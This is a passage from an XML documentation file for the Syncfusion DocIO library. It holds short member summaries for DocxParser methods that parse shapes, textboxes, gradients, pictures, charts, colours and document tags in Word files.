            <param name="lineJoinStyle">The line join style.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseShapeBorder(System.Xml.XmlReader,Syncfusion.DocIO.ReaderWriter.Biff_Records.BorderCode)">
            <summary>
            Parses the shape border.
            </summary>
            <param name="reader">The reader.</param>
            <param name="border">The border.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetShapeBorderStyle(System.String)">
            <summary>
            Gets the shape border style.
            </summary>
            <param name="boderStyle">The boder style.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParsePictureShapeProperties(System.Xml.XmlReader,Syncfusion.DocIO.DLS.IEntity)">
            <summary>
            Parses the pic shape props.
            </summary>
            <param name="reader">The reader.</param>
            <param name="ent">The ent.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParsePictureShapeStyle(System.String,Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            Parses the pic shape style
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParsePictureShapeProperties(Syncfusion.DocIO.DLS.WPicture,System.String,System.String)">
            <summary>
            Parses the pic shape props.
            </summary>
            <param name="pic">The pic.</param>
            <param name="propName">Name of the prop.</param>
            <param name="propVal">The prop val.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseTextboxProperties(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WTextBox)">
            <summary>
            Parse Text Box Properties
            </summary>
            <param name="reader"></param>
            <param name="textbox"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseTextBoxWrappingStyle(System.Xml.XmlReader,Syncfusion.DocIO.DLS.IEntity)">
            <summary>
            Parse the Text Box Wrapping Style
            </summary>
            <param name="reader"></param>
            <param name="entity"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseFillEffects(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WTextBox)">
            <summary>
            Parses the fill effect.
            </summary>
            <param name="reader">The reader.</param>
            <param name="txbx">The Textbox.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseGradientFill(System.Xml.XmlReader,Syncfusion.DocIO.DLS.Background)">
            <summary>
            Parses the gradient fill.
            </summary>
            <param name="reader">The reader.</param>
            <param name="background">The background.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseGradientColor(System.Xml.XmlReader,Syncfusion.DocIO.DLS.Background)">
            <summary>
            Parses the color of the gradient.
            </summary>
            <param name="reader">The reader.</param>
            <param name="background">The background.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseGradient(System.Xml.XmlReader,Syncfusion.DocIO.DLS.BackgroundGradient)">
            <summary>
            Parses the gradient style.
            </summary>
            <param name="reader">The reader.</param>
            <param name="gradient">The gradient.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseRadialGradient(System.Xml.XmlReader,Syncfusion.DocIO.DLS.BackgroundGradient)">
            <summary>
            
            </summary>
            <param name="reader"></param>
            <param name="gradient"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseShadingVariant(System.String)">
            <summary>
            Parses the shading variant.
            </summary>
            <param name="focus">The focus.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParsePatternFill(System.Xml.XmlReader,Syncfusion.DocIO.DLS.Background)">
            <summary>
            Parses the pattern fill.
            </summary>
            <param name="reader">The reader.</param>
            <param name="background">The background.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParsePictureFill(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WTextBox,System.String)">
            <summary>
            Parses the picture fill.
            </summary>
            <param name="reader">The reader.</param>
            <param name="txbx">The textbox.</param>
            <param name="fillType">Type of the fill.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetTextWrapType(System.String)">
            <summary>
            Parses the wrap Type.
            </summary>
            <param name="wrapType">The Wrap type</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetWrapStyle(System.String)">
            <summary>
            Parses the wrap style.
            </summary>
            <param name="reader">The reader.</param>
            <param name="txbx">The textbox.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetWrapType(System.String)">
            <summary>
            Parses the type of the wrap.
            </summary>
            <param name="wrapType">Type of the wrap.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseTextboxContent(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WTextBox)">
            <summary>
            Parses the content of the textbox.
            </summary>
            <param name="reader">The reader.</param>
            <param name="ent">The entity.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseTextBoxStyle(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WTextBox)">
            <summary>
            Parses the text box style.
            </summary>
            <param name="reader">The reader.</param>
            <param name="textbox">The textbox.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseTextboxIntMargins(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WTextBox)">
            <summary>
            Parses the internal margins of textbox.
            </summary>
            <param name="reader">The reader.</param>
            <param name="txbx">The textbox.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetTextboxMargin(System.String)">
            <summary>
            Gets the textbox margin.
            </summary>
            <param name="margin">The margin.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetShapeInternalMargin(System.String)">
            <summary>
            Gets the textbox margin.
            </summary>
            <param name="margin">The margin.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseStroke(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WTextBox)">
            <summary>
            
            </summary>
            <param name="reader"></param>
            <param name="textBox"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetDashStyle(System.String)">
            <summary>
            Parses the dash style.
            </summary>
            <param name="dashstyle">The dash style.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetLineStyle(System.String)">
            <summary>
            Parses the line style.
            </summary>
            <param name="lineStyle">The line style.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetPointValue(System.String)">
            <summary>
            Gets the point value.
            </summary>
            <param name="value"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseTextBoxGraphics(Syncfusion.DocIO.DLS.WTextBox,Syncfusion.DocIO.DLS.XmlParagraphItem)">
            <summary>
            Parse TextBox Graphics data
            </summary>
            <param name="textbox"></param>
            <param name="choiceItem"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseDrawing(System.Xml.XmlReader,Syncfusion.DocIO.DLS.ParagraphItemCollection,System.IO.MemoryStream@)">
            <summary>
            Parse the drawing object
            </summary>
            <param name="reader"></param>
            <param name="entity"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseShape(System.Xml.XmlReader,Syncfusion.DocIO.DLS.ParagraphItemCollection,System.IO.MemoryStream)">
            <summary>
            Parse Shape
            </summary>
            <param name="picReader"></param>
            <param name="paraItems"></param>
            <param name="drawingStream"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseShapeBaseProperties(System.Xml.XmlReader,Syncfusion.DocIO.DLS.ShapeBase,System.IO.MemoryStream)">
            <summary>
            Parse common properties of chart and shpae
            </summary>
            <param name="picReader"></param>
            <param name="shapeBase"></param>
            <param name="drawingStream"></param>
            <param name="wrapFormat"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParsePictureHorizontalPosition(System.Xml.XmlReader,Syncfusion.DocIO.DLS.ShapeBase)">
            <summary>
            Parse the horizontal position properties
            </summary>
            <param name="reader"></param>
            <param name="shapeBase"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParsePictureVerticalPosition(System.Xml.XmlReader,Syncfusion.DocIO.DLS.ShapeBase)">
            <summary>
            parse the vertical position element (positionV)
            </summary>
            <param name="reader"></param>
            <param name="shape"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseWrappingType(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WrapFormat)">
            <summary>
            Parse the wrapping type
            </summary>
            <param name="wrapFormat"></param>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseWrapPolygon(System.Xml.XmlReader,Syncfusion.DocIO.DLS.IEntity)">
            <summary>
            Parses the wrap polygon.
            </summary>
            <param name="reader">The reader.</param>
            <param name="entiry">The entiry.</param>
            <exception cref="T:System.Xml.XmlException">Unexpected xml tag  + reader.LocalName</exception>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseChart(System.Xml.XmlReader,Syncfusion.DocIO.DLS.ParagraphItemCollection,System.IO.MemoryStream)">
            <summary>
            Parse chart
            </summary>
            <param name="paraItems"></param>
            <param name="drawingStream"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseChartRelations(System.IO.Stream,System.Collections.Generic.Dictionary{System.String,System.Collections.DictionaryEntry})">
            <summary>
            Parse Chart relations
            </summary>
            <param name="stream"></param>
            <param name="relations"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseGraphicData(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WChart,System.IO.MemoryStream)">
            <summary>
            Parses chart data and relations
            </summary>
            <param name="reader"></param>
            <param name="chart"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetExtension(System.String)">
            <summary>
            Gets the extension string
            </summary>
            <param name="path"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseChartWorkbookThemes(Syncfusion.OfficeChart.Implementation.WorkbookImpl)">
            <summary>
            Parse themes collection of document to workbook themes collection for parsing colors of chart
            </summary>
            <param name="chart"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.SetCategortyRange(System.String,Syncfusion.OfficeChart.Implementation.WorksheetImpl,Syncfusion.OfficeChart.Implementation.Charts.ChartImpl)">
            <summary>
            Sets the category range of chart
            </summary>
            <param name="categoryRange"></param>
            <param name="chartSheet"></param>
            <param name="chart"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseGraphicData(System.Xml.XmlReader,Syncfusion.DocIO.DLS.Shape)">
            <summary>
            Parses the graphic data of shape.
            </summary>
            <param name="reader">The reader.</param>
            <param name="picture">The picture.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseEffectList(System.Xml.XmlReader,Syncfusion.DocIO.DLS.Shape)">
            <summary>
            Parses the Effect format of the auto shape.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseReflectionEffect(System.Xml.XmlReader,Syncfusion.DocIO.DLS.EffectFormat)">
            <summary>
            Parse the Reflection Effect
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseShadowEffect(System.Xml.XmlReader,System.String,Syncfusion.DocIO.DLS.EffectFormat)">
            <summary>
            Parse the shadow Effect.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseShadowAttributes(System.Xml.XmlReader,Syncfusion.DocIO.DLS.ShadowFormat)">
            <summary>
            Parse shadow attributes
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseStyleItems(System.IO.MemoryStream,Syncfusion.DocIO.DLS.Shape)">
            <summary>
             Parses the styles of graphic data.
             </summary>
             <param name="reader">The reader.</param>
             <param name="picture">The shape.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseStyleColor(System.Xml.XmlReader,System.String,System.UInt32@,System.Drawing.Color)">
            <summary>
            Parses the color.
            </summary>
            <param name="reader">The reader.</param>
            <param name="parentElement">The parent element.</param>
            <param name="opacity">The opacity.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseShapeAdjustValues(System.Xml.XmlReader,Syncfusion.DocIO.DLS.Shape)">
            <summary>
            Parses the graphic data.
            </summary>
            <param name="reader">The reader.</param>
            <param name="picture">The picture.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseBlipImage(System.Xml.XmlReader,Syncfusion.DocIO.DLS.BlipFormat)">
            <summary>
            Parses the Blip image
            </summary>
            <param name="reader">The reader.</param>
            <param name="fillFormat">Fill Format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetBlipImageValue(System.String)">
            <summary>
            Gets the Blip image values
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseDuotoneColor(System.Xml.XmlReader,System.String,System.UInt32@,Syncfusion.DocIO.DLS.BlipFormat)">
            <summary>
            Parses the Duotone colors.
            </summary>
            <param name="reader">The reader.</param>
            <param name="parentElement">The parent element.</param>
            <param name="opacity">The opacity.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseBlipExtensionList(System.Xml.XmlReader,Syncfusion.DocIO.DLS.BlipFormat)">
            <summary>
            Parse the Blip Extension List
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseImageProperties(System.Xml.XmlReader,Syncfusion.DocIO.DLS.BlipFormat)">
            <summary>
            Parse blip image properties
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseImageLayer(System.Xml.XmlReader,Syncfusion.DocIO.DLS.BlipFormat)">
            <summary>
            Parse the Image layer
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseImageEffect(System.Xml.XmlReader,Syncfusion.DocIO.DLS.BlipFormat)">
            <summary>
            Parse the Image Effect
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseImageEffectItem(System.Xml.XmlReader,Syncfusion.DocIO.DLS.ImageEffect)">
            <summary>
            Parse the Image Effect items
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetImageEffectValue(System.String)">
            <summary>
            Gets the Image Effect Value
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseBackgroundRemoval(System.Xml.XmlReader,Syncfusion.DocIO.DLS.ImageEffect)">
            <summary>
            Parse the Background removal rectange of blip picture
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseColorChange(System.Xml.XmlReader,Syncfusion.DocIO.DLS.BlipFormat)">
            <summary>
            Parse the Color change child element of the blip
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetTextDirection(System.String,System.Boolean)">
            <summary>
            To Get the shape/textbox's text direction
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseLineFormat(System.Xml.XmlReader,Syncfusion.DocIO.DLS.Shape)">
            <summary>
            To Parse the line format of the shape
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseImageHyperlink(System.Xml.XmlReader,Syncfusion.DocIO.DLS.ParagraphItemCollection)">
            <summary>
            Parse the Image Hyperlink
            </summary>
            <param name="reader">Reader</param>
            <param name="para">Paragraph</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.DownloadImage(System.String)">
            <summary>
            Download image from url
            </summary>
            <param name="url">Url</param>
            <returns>Image</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseXmlParaItem(System.IO.Stream)">
            <summary>
            Parse Xml paragraph item
            </summary>
            <param name="picReader"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseImageRelation(Syncfusion.DocIO.DLS.XmlParagraphItem,System.String)">
            <summary>
            Parses the image relation.
            </summary>
            <param name="xmlParaItem">The XML para item.</param>
            <param name="id">The id.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.FindRelationshipIds(System.IO.Stream)">
            <summary>
            Get the relationship ids present within the XmlparaItem stream
            </summary>
            <param name="XmlParaItemStream"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.FindZIndex(System.IO.Stream,Syncfusion.DocIO.DLS.XmlParagraphItem)">
            <summary>
            Find the Z-Index value in xml paragraph item
            </summary>
            <param name="XmlParaItemStream">Xml paragraph item stream</param>
            <param name="xmlParaItem">Xml paragraph item</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseShapeRelationId(Syncfusion.DocIO.DLS.XmlParagraphItem,System.Collections.Generic.List{System.String})">
            <summary>
            Parses the shape hyperlinks id.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParsePicture(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            Parse the picture
            </summary>
            <param name="reader"></param>
            <param name="picture"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParsePictureProperties(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            Parse the picture properties
            </summary>
            <param name="reader"></param>
            <param name="picture"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseGraphicData(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            Parses the graphic data.
            </summary>
            <param name="reader">The reader.</param>
            <param name="picture">The picture.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParsePictureData(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            Parses the picture data.
            </summary>
            <param name="reader">The reader.</param>
            <param name="picture">The picture.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParsePictureBlipFill(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            Parses the visual shape props.
            </summary>
            <param name="reader">The reader.</param>
            <param name="picture">The picture.</param>
            <exception cref="T:System.Xml.XmlException">Unexpected xml tag  + reader.LocalName</exception>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseVisualShapeProps(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            Parses the visual shape props.
            </summary>
            <param name="reader">The reader.</param>        
            <param name="picture">The picture.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetPictureBorderWidth(System.String,System.String)">
            <summary>
            Gets the Border Width
            </summary>
            <param name="value">Border Width</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetLineCapStyle(System.String)">
            <summary>
            Gets the line cap style.
            </summary>
            <param name="lineCap">The line cap.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseLineProps(System.Xml.XmlReader,Syncfusion.DocIO.DLS.InlineShapeObject)">
            <summary>
            Parses the line props.
            </summary>
            <param name="reader">The reader.</param>
            <param name="shape">The shape.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetLineEnd(System.String)">
            <summary>
            Gets the line end.
            </summary>
            <param name="lineEnd">The line end.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetLineEndWidth(System.String)">
            <summary>
            Gets the end width of the line.
            </summary>
            <param name="lineEndWidth">End width of the line.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetLineEndLength(System.String)">
            <summary>
            Gets the end length of the line.
            </summary>
            <param name="lineEndLength">End length of the line.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetLanguageID(System.String)">
            <summary>
            Sets the language value
            </summary>
            <param name="value"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetFlipOrientation(System.String)">
            <summary>
            Gets the flip orientation.
            </summary>
            <param name="flip">The flip.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetGradientShadeType(System.String)">
            <summary>
            Gets the type of the gradient shade.
            </summary>
            <param name="shade">The shade.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseGradientFill(System.Xml.XmlReader,Syncfusion.DocIO.DLS.GradientFill)">
            <summary>
            Parses the gradient fill.
            </summary>
            <param name="reader">The reader.</param>
            <param name="gradientFill">The gradient fill.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseGradientStop(System.Xml.XmlReader,Syncfusion.DocIO.DLS.GradientFill)">
            <summary>
            Parses the gradient stop.
            </summary>
            <param name="reader">The reader.</param>
            <param name="gradientFill">The gradient fill.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParsePathGradient(System.Xml.XmlReader,Syncfusion.DocIO.DLS.PathGradient)">
            <summary>
            Parses the path gradient.
            </summary>
            <param name="reader">The reader.</param>
            <param name="pathGradient">The path gradient.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseColor(System.Xml.XmlReader,System.String,System.UInt32@)">
            <summary>
            Parses the color.
            </summary>
            <param name="reader">The reader.</param>
            <param name="parentElement">The parent element.</param>
            <param name="opacity">The opacity.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetSystemColor(System.Xml.XmlReader)">
            <summary>
            Gets the color of the system.
            </summary>
            <param name="reader">The reader.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetSchemeColor(System.Xml.XmlReader)">
            <summary>
            Gets the color of the scheme.
            </summary>
            <param name="reader">The reader.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseColorTransform(System.Xml.XmlReader,System.String,System.Drawing.Color@,System.UInt32@)">
            <summary>
            Parses the color transform.
            </summary>
            <param name="reader">The reader.</param>
            <param name="parentElement">The parent element.</param>
            <param name="themeColor">Color of the theme.</param>
            <param name="opacity">The opacity.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseColorTransform(System.String,System.String,System.Drawing.Color@)">
            <summary>
            Parses the color transform.
            </summary>
            <param name="reader">The reader.</param>
            <param name="themeColor">Color of the theme.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetPercentage(System.String)">
            <summary>
            Gets the percentage.
            </summary>
            <param name="value">The value.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseWrappingType(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            Parse the wrapping type
            </summary>
            <param name="picture"></param>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParsePictureHorizontalPosition(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            Parse the horizontal position properties
            </summary>
            <param name="reader"></param>
            <param name="picture"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetHorizAlign(System.String)">
            <summary>
            Gets the horizontal alignment.
            </summary>
            <param name="align">The align.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetHorizOrigin(System.String)">
            <summary>
            Gets the horizontal origin.
            </summary>
            <param name="origin">The origin.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParsePictureVerticalPosition(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            parse the vertical position element (positionV)
            </summary>
            <param name="reader"></param>
            <param name="picture"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetVertAlign(System.String)">
            <summary>
            Get the vertical alignment.
            </summary>
            <param name="align">The alignment.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetTextVertAlign(System.String)">
            <summary>
            Get the vertical alignment of the Text in TextBox.
            </summary>
            <param name="align">The alignment.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetHeightOrigin(System.String)">
            <summary>
            Get the vertical Origin of the height in TextBox.
            </summary>
            <param name="rel"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetWidthOrigin(System.String)">
            <summary>
            Get the horizontal Origin of the width in TextBox.
            </summary>
            <param name="rel"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetVertOrigin(System.String)">
            <summary>
            Get the vertical origin.
            </summary>
            <param name="origin">The origin.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.CheckPicture(System.Xml.XmlReader)">
            <summary>
            Check whether the element is Picture or unsupported element
            </summary>
            <param name="reader"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseBreak(System.Xml.XmlReader,Syncfusion.DocIO.DLS.ParagraphItemCollection)">
            <summary>
            Parse the break item
            </summary>
            <param name="reader"></param>
            <param name="paragraph"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseSymbol(System.Xml.XmlReader,Syncfusion.DocIO.DLS.ParagraphItemCollection)">
            <summary>
            Parse the symbol
            </summary>
            <param name="reader">The xml reader</param>
            <param name="paragraph">The paragraph</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.UpdateTextRange(Syncfusion.DocIO.DLS.WTextRange,System.String,Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Create a text range object
            </summary>
            <param name="textRange"></param>
            <param name="text"></param>
            <param name="runFormat"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseText(System.Xml.XmlReader,Syncfusion.DocIO.DLS.ParagraphItemCollection)">
            <summary>
            Parse the run text
            </summary>
            <param name="reader"></param>
            <param name="entity"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetNestedText(System.Xml.XmlReader)">
            <summary>
            Gets the nested text.
            </summary>
            <param name="reader">The reader.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.RotateText(System.String)">
            <summary>
            Rotates the text.
            </summary>
            <param name="text">The text.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ModifyText(System.String)">
            <summary>
            Modify the text
            </summary>
            <param name="text"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseDocumentBackground(System.Xml.XmlReader)">
            <summary>
            Parse document background
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.AddAlternateChunk(Syncfusion.DocIO.DLS.IEntity)">
            <summary>
            Add the AlternateChunk to textbody.
            </summary>
            <param name="entity">The entity.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseAlternateChunk(System.Xml.XmlReader,Syncfusion.DocIO.DLS.AlternateChunk)">
            <summary>
            Parses the Alternate chunk.
            </summary>
            <param name="reader">The entity.</param>
            <param name="altChunk">The AlternateChunk.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseStructureDocumentTagInline(System.Xml.XmlReader,Syncfusion.DocIO.DLS.StructureDocumentTagInline)">
            <summary>
            Parse structure document tag block
            </summary>
            <param name="reader"></param>
            <param name="sdTagBlock"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseSDTContentInline(System.Xml.XmlReader,Syncfusion.DocIO.DLS.SDTInlineContent)">
            <summary>
            Parse SDT content
            </summary>
            <param name="reader"></param>
            <param name="sdTagBlock"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseStructureDocumentTagBlock(System.Xml.XmlReader,Syncfusion.DocIO.DLS.StructureDocumentTagBlock)">
            <summary>
            Parse structure document tag block
            </summary>
            <param name="reader"></param>
            <param name="sdTagBlock"></param>
        </member>
